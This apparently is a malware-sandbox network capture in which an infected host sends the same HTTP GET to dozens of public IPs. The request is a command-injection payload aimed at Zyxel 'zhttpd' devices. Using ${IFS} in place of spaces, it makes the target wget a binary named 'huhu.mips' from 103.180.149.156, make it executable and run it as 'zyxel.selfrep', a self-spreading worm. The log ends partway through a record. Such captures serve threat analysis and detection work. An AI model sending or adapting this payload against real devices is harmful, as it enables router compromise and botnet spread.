                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560245991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3550192.168.2.1456630183.97.112.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560275078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3551192.168.2.143381634.88.186.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560321093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3552192.168.2.1437304151.21.179.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560355902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3553192.168.2.145036046.118.140.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560411930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3554192.168.2.144704097.110.237.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560461044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3555192.168.2.1453250170.94.243.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560499907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3556192.168.2.1455270221.247.163.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560550928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3557192.168.2.1455592101.104.16.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560597897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3558192.168.2.1435010147.24.112.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560640097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3559192.168.2.143795458.89.116.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560694933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3560192.168.2.1434820191.183.107.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560734034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3561192.168.2.144203268.59.108.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560781002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3562192.168.2.1438144143.231.31.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560832024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3563192.168.2.1451358116.113.24.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560880899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3564192.168.2.145522438.63.121.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560935974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3565192.168.2.1453910192.118.87.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560982943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3566192.168.2.1432902205.20.209.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561008930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3567192.168.2.1453774177.150.15.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561041117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3568192.168.2.143864047.63.187.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561086893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3569192.168.2.1441330202.200.44.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561111927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3570192.168.2.144955837.59.76.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561167955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3571192.168.2.1443428130.142.227.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561213017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3572192.168.2.143618296.13.85.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561259031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3573192.168.2.1450162172.185.212.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561305046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3574192.168.2.1441278128.11.78.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561338902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3575192.168.2.143923043.14.129.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561383009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3576192.168.2.144604287.49.4.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561423063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3577192.168.2.143847899.192.107.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561450005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3578192.168.2.145886271.127.163.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561501980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3579192.168.2.145523897.91.67.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561526060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3580192.168.2.144317413.156.247.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561574936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3581192.168.2.1438714221.137.236.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561615944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3582192.168.2.1446708207.112.84.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561677933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3583192.168.2.14558884.140.58.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561708927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3584192.168.2.144102083.178.235.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561758041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3585192.168.2.1436618141.204.176.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561800003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3586192.168.2.1454840176.50.96.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561842918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3587192.168.2.146066666.13.124.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561904907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3588192.168.2.1442326158.95.177.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561928988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3589192.168.2.1439990210.248.123.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.561969042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3590192.168.2.1440124201.183.214.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562005043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3591192.168.2.1446100151.160.159.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562057972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3592192.168.2.144307089.183.224.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562109947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3593192.168.2.1437586223.36.108.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562148094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3594192.168.2.143406638.19.79.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562174082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3595192.168.2.1451812139.225.4.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562216997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3596192.168.2.145045013.20.26.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562273026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3597192.168.2.1441362218.101.30.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562316895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3598192.168.2.1436996139.255.111.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562347889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3599192.168.2.145414048.9.77.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562391996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3600192.168.2.1439002134.41.93.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562441111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3601192.168.2.146068865.180.0.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562479019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3602192.168.2.1456482165.132.129.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562515020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3603192.168.2.1443984131.62.195.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562561035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3604192.168.2.1454082126.216.160.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562601089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3605192.168.2.1458740123.175.31.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562637091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3606192.168.2.145710692.77.171.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562684059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3607192.168.2.1438642219.20.221.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562715054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3608192.168.2.1447374155.74.32.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562763929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3609192.168.2.1448006218.49.147.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562789917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3610192.168.2.1441056112.57.35.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562820911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3611192.168.2.143949413.203.220.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562846899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3612192.168.2.14561062.55.85.31443
                                                      TimestampBytes transferredDirectionData
